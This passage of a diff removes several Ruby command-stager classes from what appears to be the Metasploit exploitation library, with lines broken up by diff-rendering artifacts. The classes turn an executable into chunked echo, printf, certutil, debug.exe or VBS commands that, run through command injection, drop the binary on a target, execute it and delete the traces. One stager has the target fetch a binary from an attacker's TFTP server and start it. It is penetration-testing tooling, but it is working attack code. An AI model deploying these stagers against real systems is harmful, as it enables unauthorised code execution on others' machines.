# Should be overriden if the cmd stager needs to do any clenaup
|
||||
#
|
||||
def teardown(mod = nil)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,119 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
class CmdStagerBourne < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_encoded = Rex::Text.rand_text_alpha(5) + '.b64'
|
||||
@var_decoded = Rex::Text.rand_text_alpha(5)
|
||||
end
|
||||
|
||||
def generate(opts = {})
|
||||
opts[:temp] = opts[:temp] || '/tmp/'
|
||||
opts[:temp] = opts[:temp].empty?? opts[:temp] : opts[:temp] + '/'
|
||||
opts[:temp] = opts[:temp].gsub(/\/{2,}/, '/')
|
||||
opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
|
||||
opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
|
||||
if (opts[:file])
|
||||
@var_encoded = opts[:file] + '.b64'
|
||||
@var_decoded = opts[:file]
|
||||
end
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
# Override just to set the extra byte count
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
||||
@cmd_start = "echo -n "
|
||||
@cmd_end = ">>'#{@tempdir}#{@var_encoded}'"
|
||||
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Simple base64...
|
||||
#
|
||||
def encode_payload(opts)
|
||||
Rex::Text.encode_base64(@exe)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before / after it.
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
|
||||
cmds = []
|
||||
parts.each do |p|
|
||||
cmd = ''
|
||||
cmd << @cmd_start
|
||||
cmd << p
|
||||
cmd << @cmd_end
|
||||
cmds << cmd
|
||||
end
|
||||
|
||||
cmds
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
decoders = [
|
||||
"base64 --decode -",
|
||||
"openssl enc -d -A -base64 -in /dev/stdin",
|
||||
"python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
|
||||
"perl -MMIME::Base64 -ne 'print decode_base64($_)'"
|
||||
]
|
||||
decoder_cmd = []
|
||||
decoders.each do |cmd|
|
||||
binary = cmd.split(' ')[0]
|
||||
decoder_cmd << "(which #{binary} >&2 && #{cmd})"
|
||||
end
|
||||
decoder_cmd = decoder_cmd.join(" || ")
|
||||
decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > '#{@tempdir}#{@var_decoded}' < '#{@tempdir}#{@var_encoded}'"
|
||||
[ decoder_cmd ]
|
||||
end
|
||||
|
||||
def compress_commands(cmds, opts)
|
||||
# Make it all happen
|
||||
cmds << "chmod +x '#{@tempdir}#{@var_decoded}'"
|
||||
# Background the process, allowing the cleanup code to continue and delete the data
|
||||
# while allowing the original shell to continue to function since it isn't waiting
|
||||
# on the payload to exit. The 'sleep' is required as '&' is a command terminator
|
||||
# and having & and the cmds delimiter ';' next to each other is invalid.
|
||||
if opts[:background]
|
||||
cmds << "'#{@tempdir}#{@var_decoded}' & sleep 2"
|
||||
else
|
||||
cmds << "'#{@tempdir}#{@var_decoded}'"
|
||||
end
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
if (not opts[:nodelete])
|
||||
cmds << "rm -f '#{@tempdir}#{@var_decoded}'"
|
||||
cmds << "rm -f '#{@tempdir}#{@var_encoded}'"
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def cmd_concat_operator
|
||||
" ; "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,115 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides the ability to create a sequence of commands from an executable.
|
||||
# When this sequence is ran via command injection or a shell, the resulting exe will
|
||||
# be written to disk and executed.
|
||||
#
|
||||
# This particular version uses Windows certutil to base64 decode a file,
|
||||
# created via echo >>, and decode it to the final binary.
|
||||
#
|
||||
#
|
||||
# Written by xistence
|
||||
# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
|
||||
#
|
||||
###
|
||||
|
||||
class CmdStagerCertutil < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_encoded = Rex::Text.rand_text_alpha(5)
|
||||
@var_decoded = Rex::Text.rand_text_alpha(5)
|
||||
@decoder = nil # filled in later
|
||||
end
|
||||
|
||||
|
||||
# Override just to set the extra byte count
|
||||
# @param opts [Array] The options to generate the command line
|
||||
# @return [Array] The complete command line
|
||||
def generate_cmds(opts)
|
||||
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
||||
@cmd_start = "echo "
|
||||
@cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
|
||||
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
# Simple base64 encoder for the executable
|
||||
# @param opts [Array] The options to generate the command line
|
||||
# @return [String] Base64 encoded executable
|
||||
def encode_payload(opts)
|
||||
Rex::Text.encode_base64(@exe)
|
||||
end
|
||||
|
||||
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before / after it.
|
||||
# @param parts [Array] Splitted commands
|
||||
# @param opts [Array] The options to generate the command line
|
||||
# @return [Array] The command line
|
||||
def parts_to_commands(parts, opts)
|
||||
|
||||
cmds = []
|
||||
parts.each do |p|
|
||||
cmd = ''
|
||||
cmd << @cmd_start
|
||||
cmd << p
|
||||
cmd << @cmd_end
|
||||
cmds << cmd
|
||||
end
|
||||
|
||||
cmds
|
||||
end
|
||||
|
||||
|
||||
# Generate the commands that will decode the file we just created
|
||||
# @param opts [Array] The options to generate the command line
|
||||
# @return [Array] The certutil Base64 decoder part of the command line
|
||||
def generate_cmds_decoder(opts)
|
||||
|
||||
cmds = []
|
||||
cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
|
||||
return cmds
|
||||
end
|
||||
|
||||
|
||||
# We override compress commands just to stick in a few extra commands
|
||||
# last second..
|
||||
# @param cmds [Array] Complete command line
|
||||
# @param opts [Array] Extra options for command line generation
|
||||
# @return [Array] The complete command line including cleanup
|
||||
def compress_commands(cmds, opts)
|
||||
# Make it all happen
|
||||
cmds << "#{@tempdir}#{@var_decoded}.exe"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
if (not opts[:nodelete])
|
||||
cmds << "del #{@tempdir}#{@var_encoded}.b64"
|
||||
# NOTE: We won't be able to delete the exe while it's in use.
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
# Windows uses & to concat strings
|
||||
#
|
||||
# @return [String] Concat operator
|
||||
def cmd_concat_operator
|
||||
" & "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,140 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides the ability to create a sequence of commands from an executable.
|
||||
# When this sequence is ran via command injection or a shell, the resulting exe will
|
||||
# be written to disk and executed.
|
||||
#
|
||||
# This particular version uses debug.exe to assemble a small COM file. The COM will
|
||||
# take a hex-ascii file, created via echo >>, and decode it to the final binary.
|
||||
#
|
||||
# Requires: debug.exe
|
||||
#
|
||||
# Written by Joshua J. Drake
|
||||
#
|
||||
###
|
||||
|
||||
class CmdStagerDebugAsm < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
|
||||
@var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
|
||||
@var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
|
||||
@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
|
||||
@decoder = nil # filled in later
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Override just to set the extra byte count
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
||||
@cmd_start = "echo "
|
||||
@cmd_end = ">>#{@tempdir}#{@var_payload_in}"
|
||||
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Simple hex encoding...
|
||||
#
|
||||
def encode_payload(opts)
|
||||
ret = @exe.unpack('H*')[0]
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before / after it.
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
|
||||
cmds = []
|
||||
parts.each do |p|
|
||||
cmd = ''
|
||||
cmd << @cmd_start
|
||||
cmd << p
|
||||
cmd << @cmd_end
|
||||
cmds << cmd
|
||||
end
|
||||
|
||||
cmds
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
|
||||
# Allow decoder stub override (needs to input base64 and output bin)
|
||||
@decoder = opts[:decoder] if (opts[:decoder])
|
||||
|
||||
# Read the decoder data file
|
||||
f = File.new(@decoder, "rb")
|
||||
decoder = f.read(f.stat.size)
|
||||
f.close
|
||||
|
||||
# Replace variables
|
||||
decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
|
||||
decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
|
||||
# NOTE: these two filenames MUST 8+3 chars long.
|
||||
decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
|
||||
decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
|
||||
|
||||
# Split it apart by the lines
|
||||
decoder.split("\n")
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# We override compress commands just to stick in a few extra commands
|
||||
# last second..
|
||||
#
|
||||
def compress_commands(cmds, opts)
|
||||
# Convert the debug script to an executable...
|
||||
cvt_cmd = ''
|
||||
if (@tempdir != '')
|
||||
cvt_cmd << "cd %TEMP% && "
|
||||
end
|
||||
cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
|
||||
cmds << cvt_cmd
|
||||
|
||||
# Convert the encoded payload...
|
||||
cmds << "#{@tempdir}#{@var_decoder_com}"
|
||||
|
||||
# Make it all happen
|
||||
cmds << "start #{@tempdir}#{@var_payload_out}"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
if (not opts[:nodelete])
|
||||
cmds << "del #{@tempdir}#{@var_decoder_asm}"
|
||||
cmds << "del #{@tempdir}#{@var_decoder_com}"
|
||||
cmds << "del #{@tempdir}#{@var_payload_in}"
|
||||
# XXX: We won't be able to delete the payload while it is running..
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
# Windows uses & to concat strings
|
||||
def cmd_concat_operator
|
||||
" & "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,134 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides the ability to create a sequence of commands from an executable.
|
||||
# When this sequence is ran via command injection or a shell, the resulting exe will
|
||||
# be written to disk and executed.
|
||||
#
|
||||
# This particular version uses debug.exe to write a small .NET binary. That binary will
|
||||
# take a hex-ascii file, created via echo >>, and decode it to the final binary.
|
||||
#
|
||||
# Requires: .NET, debug.exe
|
||||
#
|
||||
###
|
||||
|
||||
class CmdStagerDebugWrite < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_bypass = Rex::Text.rand_text_alpha(8)
|
||||
@var_payload = Rex::Text.rand_text_alpha(8)
|
||||
@decoder = nil # filled in later
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Override just to set the extra byte count
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
||||
@cmd_start = "echo "
|
||||
@cmd_end = ">>#{@tempdir}#{@var_payload}"
|
||||
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Simple hex encoding...
|
||||
#
|
||||
def encode_payload(opts)
|
||||
@exe.unpack('H*')[0]
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before / after it.
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
|
||||
cmds = []
|
||||
parts.each do |p|
|
||||
cmd = ''
|
||||
cmd << @cmd_start
|
||||
cmd << p
|
||||
cmd << @cmd_end
|
||||
cmds << cmd
|
||||
end
|
||||
|
||||
cmds
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
|
||||
# Allow decoder stub override (needs to input base64 and output bin)
|
||||
@decoder = opts[:decoder] if (opts[:decoder])
|
||||
|
||||
# Read the decoder data file
|
||||
f = File.new(@decoder, "rb")
|
||||
decoder = f.read(f.stat.size)
|
||||
f.close
|
||||
|
||||
# Replace variables
|
||||
decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
|
||||
|
||||
# Split it apart by the lines
|
||||
decoder.split("\n")
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# We override compress commands just to stick in a few extra commands
|
||||
# last second..
|
||||
#
|
||||
def compress_commands(cmds, opts)
|
||||
# Convert the debug script to an executable...
|
||||
cvt_cmd = ''
|
||||
if (@tempdir != '')
|
||||
cvt_cmd << "cd %TEMP% && "
|
||||
end
|
||||
cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
|
||||
cmds << cvt_cmd
|
||||
|
||||
# Rename the resulting binary
|
||||
cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
|
||||
|
||||
# Converting the encoded payload...
|
||||
cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
|
||||
|
||||
# Make it all happen
|
||||
cmds << "start #{@tempdir}#{@var_payload}.exe"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
if (not opts[:nodelete])
|
||||
cmds << "del #{@tempdir}#{@var_bypass}.exe"
|
||||
cmds << "del #{@tempdir}#{@var_payload}"
|
||||
# XXX: We won't be able to delete the payload while it is running..
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
# Windows uses & to concat strings
|
||||
def cmd_concat_operator
|
||||
" & "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,167 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
require 'shellwords'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
class CmdStagerEcho < CmdStagerBase
|
||||
|
||||
ENCODINGS = {
|
||||
'hex' => "\\\\x",
|
||||
'octal' => "\\\\"
|
||||
}
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_elf = Rex::Text.rand_text_alpha(5)
|
||||
end
|
||||
|
||||
#
|
||||
# Override to ensure opts[:temp] is a correct *nix path
|
||||
# and initialize opts[:enc_format].
|
||||
#
|
||||
def generate(opts = {})
|
||||
opts[:temp] = opts[:temp] || '/tmp/'
|
||||
|
||||
unless opts[:temp].empty?
|
||||
opts[:temp].gsub!(/\\/, '/')
|
||||
opts[:temp] = opts[:temp].shellescape
|
||||
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
|
||||
end
|
||||
|
||||
# by default use the 'hex' encoding
|
||||
opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
|
||||
|
||||
unless ENCODINGS.keys.include?(opts[:enc_format])
|
||||
raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
# Override to set the extra byte count
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
||||
@cmd_start = "echo "
|
||||
unless opts[:noargs]
|
||||
@cmd_start += "-en "
|
||||
end
|
||||
|
||||
@cmd_end = ">>#{@tempdir}#{@var_elf}"
|
||||
xtra_len = @cmd_start.length + @cmd_end.length
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
|
||||
@prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
|
||||
min_part_size = 5 # for both encodings
|
||||
|
||||
if (opts[:linemax] - opts[:extra]) < min_part_size
|
||||
raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Encode into a format that echo understands, where
|
||||
# interpretation of backslash escapes are enabled. For
|
||||
# hex, it'll look like "\\x41\\x42", and octal will be
|
||||
# "\\101\\102\\5\\41"
|
||||
#
|
||||
def encode_payload(opts)
|
||||
case opts[:enc_format]
|
||||
when 'octal'
|
||||
return Rex::Text.to_octal(@exe, @prefix)
|
||||
else
|
||||
return Rex::Text.to_hex(@exe, @prefix)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before ("echo -en ") / after (">>file") it.
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
parts.map do |p|
|
||||
cmd = ''
|
||||
cmd << @cmd_start
|
||||
cmd << p
|
||||
cmd << @cmd_end
|
||||
cmd
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Since the binary has been already dropped to fs, just execute and
|
||||
# delete it
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
cmds = []
|
||||
# Make it all happen
|
||||
cmds << "chmod 777 #{@tempdir}#{@var_elf}"
|
||||
#cmds << "chmod +x #{@tempdir}#{@var_elf}"
|
||||
cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
unless opts[:nodelete]
|
||||
cmds << "rm -f #{@tempdir}#{@var_elf}"
|
||||
end
|
||||
|
||||
return cmds
|
||||
end
|
||||
|
||||
#
|
||||
# Override it to ensure that the hex representation of a byte isn't cut
|
||||
#
|
||||
def slice_up_payload(encoded, opts)
|
||||
encoded_dup = encoded.dup
|
||||
|
||||
parts = []
|
||||
xtra_len = opts[:extra]
|
||||
xtra_len ||= 0
|
||||
while (encoded_dup.length > 0)
|
||||
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
|
||||
# cut the end of the part until we reach the start
|
||||
# of a full byte representation "\\xYZ" or "\\YZX"
|
||||
temp = fix_last_byte(temp, opts, encoded_dup)
|
||||
parts << temp
|
||||
encoded_dup.slice!(0, temp.length)
|
||||
end
|
||||
|
||||
parts
|
||||
end
|
||||
|
||||
def fix_last_byte(part, opts, remaining="")
|
||||
fixed_part = part.dup
|
||||
|
||||
case opts[:enc_format]
|
||||
when 'hex'
|
||||
while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
|
||||
fixed_part.chop!
|
||||
end
|
||||
when 'octal'
|
||||
if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
|
||||
pos = fixed_part.rindex('\\')
|
||||
pos -= 1 if fixed_part[pos-1] == '\\'
|
||||
fixed_part.slice!(pos..fixed_part.length-1)
|
||||
end
|
||||
end
|
||||
|
||||
return fixed_part
|
||||
end
|
||||
|
||||
def cmd_concat_operator
|
||||
" ; "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,122 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
require 'shellwords'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
class CmdStagerPrintf < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_elf = Rex::Text.rand_text_alpha(5)
|
||||
end
|
||||
|
||||
#
|
||||
# Override to ensure opts[:temp] is a correct *nix path
|
||||
#
|
||||
def generate(opts = {})
|
||||
opts[:temp] = opts[:temp] || '/tmp/'
|
||||
opts[:temp].gsub!(/\\/, '/')
|
||||
opts[:temp] = opts[:temp].shellescape
|
||||
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
# Override to set the extra byte count
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
if opts[:noquotes]
|
||||
@cmd_start = "printf "
|
||||
@cmd_end = ">>#{@tempdir}#{@var_elf}"
|
||||
@prefix = '\\\\'
|
||||
min_part_size = 5
|
||||
else
|
||||
@cmd_start = "printf '"
|
||||
@cmd_end = "'>>#{@tempdir}#{@var_elf}"
|
||||
@prefix = '\\'
|
||||
min_part_size = 4
|
||||
end
|
||||
xtra_len = @cmd_start.length + @cmd_end.length
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
|
||||
if (opts[:linemax] - opts[:extra]) < min_part_size
|
||||
raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
# Encode into a "\12\345" octal format that printf understands
|
||||
#
|
||||
def encode_payload(opts)
|
||||
return Rex::Text.to_octal(@exe, @prefix)
|
||||
end
|
||||
|
||||
#
|
||||
# Override it to ensure that the octal representation of a byte isn't cut
|
||||
#
|
||||
def slice_up_payload(encoded, opts)
|
||||
encoded_dup = encoded.dup
|
||||
|
||||
parts = []
|
||||
xtra_len = opts[:extra]
|
||||
xtra_len ||= 0
|
||||
while (encoded_dup.length > 0)
|
||||
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
|
||||
|
||||
# remove the last octal escape if it is imcomplete
|
||||
if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
|
||||
pos = temp.rindex('\\')
|
||||
pos -= 1 if temp[pos-1] == '\\'
|
||||
temp.slice!(pos..temp.length-1)
|
||||
end
|
||||
|
||||
parts << temp
|
||||
encoded_dup.slice!(0, temp.length)
|
||||
end
|
||||
|
||||
parts
|
||||
end
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before and after it.
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
parts.map do |p|
|
||||
@cmd_start + p + @cmd_end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Since the binary has been already dropped to disk, just execute and
|
||||
# delete it
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
cmds = []
|
||||
# Make it all happen
|
||||
cmds << "chmod +x #{@tempdir}#{@var_elf}"
|
||||
cmds << "#{@tempdir}#{@var_elf}"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
unless opts[:nodelete]
|
||||
cmds << "rm -f #{@tempdir}#{@var_elf}"
|
||||
end
|
||||
|
||||
return cmds
|
||||
end
|
||||
|
||||
def cmd_concat_operator
|
||||
" ; "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,71 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides the ability to create a sequence of commands from an executable.
|
||||
# When this sequence is ran via command injection or a shell, the resulting exe will
|
||||
# be written to disk and executed.
|
||||
#
|
||||
# This particular version uses tftp.exe to download a binary from the specified
|
||||
# server. The original file is preserve, not encoded at all, and so this version
|
||||
# is significantly simpler than other methods.
|
||||
#
|
||||
# Requires: tftp.exe, outbound udp connectivity to a tftp server
|
||||
#
|
||||
# Written by Joshua J. Drake
|
||||
#
|
||||
###
|
||||
|
||||
class CmdStagerTFTP < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
|
||||
end
|
||||
|
||||
def setup(mod)
|
||||
self.tftp = Rex::Proto::TFTP::Server.new
|
||||
self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
|
||||
self.tftp.start
|
||||
mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
|
||||
end
|
||||
|
||||
def teardown(mod = nil)
|
||||
self.tftp.stop
|
||||
end
|
||||
|
||||
#
|
||||
# We override compress commands just to stick in a few extra commands
|
||||
# last second..
|
||||
#
|
||||
def compress_commands(cmds, opts)
|
||||
# Initiate the download
|
||||
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
|
||||
|
||||
# Make it all happen
|
||||
cmds << "start #{@tempdir + @payload_exe}"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
if (not opts[:nodelete])
|
||||
# XXX: We won't be able to delete the payload while it is running..
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
|
||||
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
|
||||
# the start command being issued separately so that it can ignore it :)
|
||||
attr_reader :exe
|
||||
attr_reader :payload_exe
|
||||
attr_accessor :tftp
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,126 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides the ability to create a sequence of commands from an executable.
|
||||
# When this sequence is ran via command injection or a shell, the resulting exe will
|
||||
# be written to disk and executed.
|
||||
#
|
||||
# This particular version uses Windows Scripting (VBS) to base64 decode a file,
|
||||
# created via echo >>, and decode it to the final binary.
|
||||
#
|
||||
# Requires: Windows Scripting
|
||||
# Known Issue: errors with non-ascii-native systems
|
||||
#
|
||||
# Written by bannedit
|
||||
#
|
||||
###
|
||||
|
||||
class CmdStagerVBS < CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
super
|
||||
|
||||
@var_decoder = Rex::Text.rand_text_alpha(5)
|
||||
@var_encoded = Rex::Text.rand_text_alpha(5)
|
||||
@var_decoded = Rex::Text.rand_text_alpha(5)
|
||||
@decoder = nil # filled in later
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Override just to set the extra byte count
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
||||
@cmd_start = "echo "
|
||||
@cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
|
||||
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
||||
opts.merge!({ :extra => xtra_len })
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Simple base64...
|
||||
#
|
||||
def encode_payload(opts)
|
||||
Rex::Text.encode_base64(@exe)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before / after it.
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
|
||||
cmds = []
|
||||
parts.each do |p|
|
||||
cmd = ''
|
||||
cmd << @cmd_start
|
||||
cmd << p
|
||||
cmd << @cmd_end
|
||||
cmds << cmd
|
||||
end
|
||||
|
||||
cmds
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
|
||||
# Allow decoder stub override (needs to input base64 and output bin)
|
||||
@decoder = opts[:decoder] if (opts[:decoder])
|
||||
|
||||
# Read the decoder data file
|
||||
f = File.new(@decoder, "rb")
|
||||
decoder = f.read(f.stat.size)
|
||||
f.close
|
||||
|
||||
# Replace variables
|
||||
decoder.gsub!(/decode_stub/, "#{@tempdir}#{@var_decoder}.vbs")
|
||||
decoder.gsub!(/ENCODED/, "#{@tempdir}#{@var_encoded}.b64")
|
||||
decoder.gsub!(/DECODED/, "#{@tempdir}#{@var_decoded}.exe")
|
||||
|
||||
# Split it apart by the lines
|
||||
decoder.split("\n")
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# We override compress commands just to stick in a few extra commands
|
||||
# last second..
|
||||
#
|
||||
def compress_commands(cmds, opts)
|
||||
# Make it all happen
|
||||
cmds << "cscript //nologo #{@tempdir}#{@var_decoder}.vbs"
|
||||
|
||||
# Clean up after unless requested not to..
|
||||
if (not opts[:nodelete])
|
||||
cmds << "del #{@tempdir}#{@var_decoder}.vbs"
|
